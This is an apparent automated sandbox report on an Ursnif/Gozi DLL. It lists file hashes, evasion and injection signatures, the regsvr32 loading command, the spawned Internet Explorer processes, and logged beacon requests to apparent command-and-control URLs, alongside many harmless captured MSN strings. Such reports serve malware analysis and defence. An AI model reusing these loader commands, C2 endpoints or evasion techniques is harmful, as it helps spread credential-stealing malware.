Loading ...

Play interactive tourEdit tour

Analysis Report p1cture3.dll

Overview

General Information

Sample Name:p1cture3.dll
Analysis ID:332237
MD5:363430ba47c7d69f75e9bc90dbbc1d8c
SHA1:47fe41dd67e0245c1ece8fcd2c10c713823db833
SHA256:00af5f13551c5e20fe29ec3d12dca555a56cd1edcd0a8633373872334de485ae
Tags:dllenelgaseluceGoziISFBUrsnif

Most interesting Screenshot:

Detection

Ursnif
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Ursnif
Creates a COM Internet Explorer object
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5972 cmdline: loaddll32.exe 'C:\Users\user\Desktop\p1cture3.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • regsvr32.exe (PID: 5560 cmdline: regsvr32.exe /s C:\Users\user\Desktop\p1cture3.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • cmd.exe (PID: 5608 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6112 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 2172 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6324 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 4920 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6112 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.246155048.0000000004C08000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.246163014.0000000004C08000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.246138579.0000000004C08000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.246106262.0000000004C08000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.246073965.0000000004C08000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: p1cture3.dllVirustotal: Detection: 20%Perma Link
            Source: p1cture3.dllReversingLabs: Detection: 18%
            Source: 1.2.regsvr32.exe.a80000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen8
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_00DF32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_00DF32BA

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: global trafficHTTP traffic detected: GET /images/jhYAn3wKHkyVTfw0/00VSw8f6pL0WGBk/m4PqAGyanFhkbyBOYl/qp5aS987V/V_2F_2BDl1vlB4fNYU_2/F2MBpXT1koABcUI5eof/xLEdBGKD7jA0v_2Fz7BWKv/3L_2BuB2pgeH4/HkdTjRHb/hcfpV3qoBZMqxjVhpVXAZkF/kYfRQAAcy4/xtA2JR23ptN8RGY98/Uvv3IGmm/Pvn0.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: de-ch[1].htm.4.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: de-ch[1].htm.4.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.4.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: ~DFFBA25DDF25B6D254.TMP.3.dr, {9F198FF5-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: http://gstatistics.co/images/GoexDOefGezKVL0h1dQfW/P8ihkSPhjIn_2Buh/vqH_2F_2BqoQIE1/Bq8bHihrQ4ihYZlN
            Source: de-ch[1].htm.4.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.4.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: {3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: iab2Data[1].json.4.drString found in binary or memory: https://bealion.com/politica-de-cookies
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: iab2Data[1].json.4.drString found in binary or memory: https://channelpilot.co.uk/privacy-policy
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=235514&amp;a=3064090&amp;g=24888006&amp;epi=dech-shoppingstri
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=dech-shoppingstri
            Source: {3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: {3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: {3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: iab2Data[1].json.4.drString found in binary or memory: https://docs.prebid.org/privacy.html
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: de-ch[1].htm.4.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: de-ch[1].htm.4.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
            Source: iab2Data[1].json.4.drString found in binary or memory: https://listonic.com/privacy/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1608297181&amp;rver
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1608297181&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/logout.srf?ct=1608297182&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1608297181&amp;rver=7.0.6730.0&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: de-ch[1].htm.4.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.4.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.4.drString found in binary or memory: https://outlook.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: de-ch[1].htm.4.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
            Source: iab2Data[1].json.4.drString found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
            Source: iab2Data[1].json.4.drString found in binary or memory: https://quantyoo.de/datenschutz
            Source: iab2Data[1].json.4.drString found in binary or memory: https://related.hu/adatkezeles/
            Source: {3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
            Source: imagestore.dat.4.dr, imagestore.dat.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1c271x.img?h=368&amp
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://support.skype.com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://twitter.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://twitter.com/i/notifications;Ich
            Source: de-ch[1].htm.4.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1
            Source: de-ch[1].htm.4.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.admo.tv/en/privacy-policy
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=dech-edge&amp;ued=ht
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.brightcom.com/privacy-policy/
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.gadsme.com/privacy-policy/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/
            Source: {3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/banker-stellt-karton-zu-fr%c3%bch-raus-und-muss-nun-500-fr-zahl
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/besonders-erstsemestrige-f%c3%bchlen-sich-einsam-und-isoliert/a
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/blerim-dzemaili-kehrt-zum-fc-z%c3%bcrich-zur%c3%bcck/ar-BB1c2bg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/er-hat-sich-immer-wieder-aufgerappelt/ar-BB1c1JR3?ocid=hplocaln
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/junge-is-r%c3%bcckkehrerin-wehrt-sich-erfolgreich-gegen-urteil/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/konkursverfahren-%c3%bcber-rolf-erb-nach-16-jahren-abgeschlosse
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/regierung-genehmigt-27-millionen-f%c3%bcr-n%c3%a4chste-glattalb
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/rolf-erbs-gl%c3%a4ubiger-erhalten-hohe-erl%c3%b6se/ar-BB1c2kH2?
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/rund-100-000-betreibungen-leiten-die-krankenkassen-im-kanton-z%
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/sport/fussball/fcz-frauen-beissen-sich-die-z%c3%a4hne-aus/ar-BB1c1dBl?ocid
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.remixd.com/privacy_policy.html
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.skype.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/de
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/de/download-skype
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
